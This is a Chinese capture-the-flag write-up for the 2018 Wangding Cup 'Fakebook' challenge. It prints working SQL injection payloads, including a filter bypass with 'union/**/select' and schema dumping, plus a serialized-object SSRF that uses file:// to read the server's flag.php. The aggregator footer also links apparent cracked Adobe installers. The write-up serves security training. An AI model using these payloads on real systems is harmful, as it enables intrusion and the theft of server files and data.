[网鼎杯 2018]Fakebook 1

news/2024/11/16 12:02:51/文章来源:https://www.cnblogs.com/tazmi/p/18549230

[网鼎杯 2018]Fakebook 1

打开实例发现为博客列表,有登录跳转和类似注册或者添加博客的join跳转

image-20241115223120952

查看源码无果

打开登陆页,尝试万能密码

image-20241115225259566

没有用,尝试从join入手,用admin去随便join一个

image-20241115225618140

显示博客不存在

期间尝试多种sql注入方法均没有效果,转去其他方向

尝试dirsearch目录爆破,发现了几个有用的小玩意儿

image-20241115230935861

image-20241115231211847

image-20241115232909907

注意到robots.txtflag.php等目录

访问robots.txt发现/user.php.bak备份文件路径

image-20241116102619000

打开bak文件,发现php代码

image-20241116102703087

注意到get方法里面存在curl_exec(),可能这道题为ssrf漏洞利用

image-20241116103403034

同时注意到isValidBlog()方法的正则匹配,判断出传入的blog参数值必须为url形式

image-20241116103659536

验证,join页面添加成功

image-20241116103801045

列表出现刚刚添加的输出,点击蓝字进去,发现no参数

image-20241116103915095

image-20241116103927688

回显起刚刚扫到的db.php路径,尝试sql注入

由于注意到bak文件中,age被强转为int,所以这边采用数字型注入方法

image-20241116104558443

and拼接

image-20241116104701993

报错,但是显示出了view.php的路径,由此可以判断flag.php的路径为

 /var/www/html/flag.php

?no=1 and 1=1回显正常,判断存在sql注入

image-20241116104803840

order by判断字段数

?no=1 order by 5

image-20241116104858358

可以看到,当order by 5时候报错,所以字段数为4

union联合查询

?no=1 union select 1,2,3,database()

image-20241116105004034

显示no hack_,判断存在字段过滤

image-20241116105212763

image-20241116105224812

image-20241116105244741

可以看到,union和select均没有被过滤,但是两个加在一起就被过滤,由此可以判断union select被过滤,这边采用/**/注释绕过

?no=-1 union/**/select 1,2,3,4

image-20241116105714816

成功绕过,看到username回显正常,判断username为回显位置,为2

查询当前数据库

?no=-1 union/**/select 1,database(),3,4

image-20241116105848114

库名为fakebook

爆库

?no=-1 union/**/select 1,group_concat(schema_name),3,4 from information_schema.schemata

image-20241116110244709

数据库

fakebook,information_schema,mysql,performance_schema,test

看来fakebook就是我们要的库,爆表

?no=-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema="fakebook"

image-20241116110357432

获得users

爆字段

?no=-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_name="users"

image-20241116110514430

获得字段

no,username,passwd,data

查数据

?no=-1 union/**/select 1,concat(no,"\n",username,"\n",passwd,"\n",data),3,4 from users

image-20241116111009098

注意到data字段里面的数据为刚刚我们join的数据的序列化形式

image-20241116111123118

好玩的来了,注意到源代码这边使用的是iframe

image-20241116111211178

前面分析可知flag.php的路径,ssrf访问文件可以用伪协议file://,把序列化字符串作为参数输入

测试,将blog值改为百度的网址

no=-1 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:18;s:4:"blog";s:22:"https://www.baidu.com/";}'

image-20241116112455099

检查元素,发现百度在iframe内用base64的形式被加载了出来

image-20241116112545917

验证成功:

这边由于原本的https://www.baodu.com/是22,所以构造payload时这边改成file:///var/www/html/flag.php要更改长度为29

image-20241116113925419

构造payload

?no=-1 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:18;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

显示正常

image-20241116114018580

查看源代码,发现base64编码字符串

image-20241116114043495

解码获得flag

image-20241116114116599

flag{8d399df2-335e-4fb8-9c18-f5be2ecfea00}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/834535.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【Adobe Premiere pro 2025下载与安装教程】

【Adobe Premiere pro 2025下载与安装教程】

1、安装包「Adobe Premiere Pro 2025」: 链接:https://pan.quark.cn/s/e93beb96accb 提取码:CGY2 2、安装教程 1) 下载软件安装包,打开安装目录,双击Setup.exe安装,弹出安装对话框2) 选择安装目录,尽量不要选C盘,点击继续3) 等待安装过程完成,点…
阅读更多...
人工智能同样也会读死书----“过拟合”

人工智能同样也会读死书----“过拟合”

上一篇:《“嵌入”在大语言模型中是解决把句子转换成向量表示的技术》 序言:我们常常会说某某人只会“读死书”,题目稍微变一点就不会做了。这其实是我们人类学习中很常见的现象。可是你知道吗?人工智能其实更容易“读死书”。不过在人工智能领域,我们有个听起来高大上的说…
阅读更多...
D45XT80-ASEMI电机专用整流桥D45XT80

D45XT80-ASEMI电机专用整流桥D45XT80

D45XT80-ASEMI电机专用整流桥D45XT80编辑:ll D45XT80-ASEMI电机专用整流桥D45XT80 型号:D45XT80 品牌:ASEMI 封装:DXT-5 特性:插件桥堆 正向电流:45A 反向耐压:800V 恢复时间:>2000ns 引脚数量:5 芯片个数:4 芯片尺寸:50MIL 浪涌电流:450A 漏电流:>10uA 工作温…
阅读更多...
【Adobe Acrobat pro 2024软件下载与安装教程-PDF编辑神奇】

【Adobe Acrobat pro 2024软件下载与安装教程-PDF编辑神奇】

1、安装包 「Adobe Acrobat 2024」: 链接:https://pan.quark.cn/s/86f8683afe5c 提取码:4uur 2、安装教程(建议关闭杀毒软件和系统防护) 1) 下载软件安装包,打开安装目录,双击Setup.exe安装,弹出安装对话框2) 点击安装按钮3) 正在安装4) 安装…
阅读更多...
书生共学大模型训练营第4期 L1G200任务提交

书生共学大模型训练营第4期 L1G200任务提交

MindSearch搜索引擎示例书生浦语对话模型调用示例书生万象开源视觉语言模型调用实例进阶任务:MindSearch话题挑战 https://www.zhihu.com/people/zhang-shu-yang-92-96
阅读更多...
使用nvm管理多版本node的详细教程

使用nvm管理多版本node的详细教程

在开发工作中,经常在不同的项目中使用不同版本的node去开发,换一个项目在重新安装node太麻烦,所以使用nvm来管理多版本的node开发环境,就非常方便了,所以本文给大家介绍了如何使用nvm管理多版本node,需要的朋友可以参考下前言 在开发工作中,经常在不同的项目中使用不同版本的n…
阅读更多...
Metasploit Pro 4.22.5-2024111401 (Linux, Windows) - 专业渗透测试框架

Metasploit Pro 4.22.5-2024111401 (Linux, Windows) - 专业渗透测试框架

Metasploit Pro 4.22.5-2024111401 (Linux, Windows) - 专业渗透测试框架Metasploit Pro 4.22.5-2024111401 (Linux, Windows) - 专业渗透测试框架 Rapid7 Penetration testing, released Nov 14, 2024 请访问原文链接:https://sysin.org/blog/metasploit-pro-4/ 查看最新版。…
阅读更多...
.ts文件和d.ts文件对比

.ts文件和d.ts文件对比

TS中有俩种文件类型,一种是.ts文件,一种是.d.ts文件 .ts文件 既可以包含类型信息也可以写逻辑代码 可以被编译为js文件 .d.ts文件 只能包含类型信息不可以写逻辑代码 不会被编译为js文件,仅做类型校验检查 自定义类型声明文件 d.ts文件在项目中是可以进行自定义创建的,通常…
阅读更多...
Ubuntu Server 20.04 安装MySQL

Ubuntu Server 20.04 安装MySQL

1. 通过apt安装MySQL1 #命令1 2 sudo apt-get update 3 #命令2 4 sudo apt-get install mysql-server2. 配置mysql初始化信息1 sudo mysql_secure_installation配置说明:ubuntu@VM-0-10-ubuntu:~$ sudo mysql_secure_installationSecuring the MySQL server deployment.Connec…
阅读更多...
【Adobe Photoshop 2025下载与安装】

【Adobe Photoshop 2025下载与安装】

‌Photoshop 2025的安装环境要求主要包括操作系统、处理器、内存、显卡、显示器分辨率和硬盘空间等方面的具体要求。‌ 操作系统要求‌Windows‌:支持Windows 10(版本21H2)或更高版本,不支持Windows的长期服务版(LTSC)。处理器要求‌Windows‌:支持64位的多核Intel或AMD…
阅读更多...
IPEX几代接口的区别

IPEX几代接口的区别

IPEX共分五代,简单判别IPEX接口是几代的方法是测量直径。 IPEX 1代 高度小于3.0mm,端子口径φ2.0 IPEX 2代 高度小于2.1mm,端子口径φ2.0 IPEX 3代 高度小于1.6mm,端子口径φ1.4 IPEX 4代 高度小于1.7mm,端子口径φ1.5 IPEX 5代 高度小于1.3mm,…
阅读更多...
vue3:computed

vue3:computed

扫码或者点击文字后台提问 原文: https://mp.weixin.qq.com/s/36dd--oj6jmkZblfJRh4iw computed 支持选项式写法 和 函数式写法 1.选项式写法 支持一个对象传入get函数以及set函数自定义操作2.函数式写法 只能支持一个getter函数不允许修改值的<template><div>&l…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023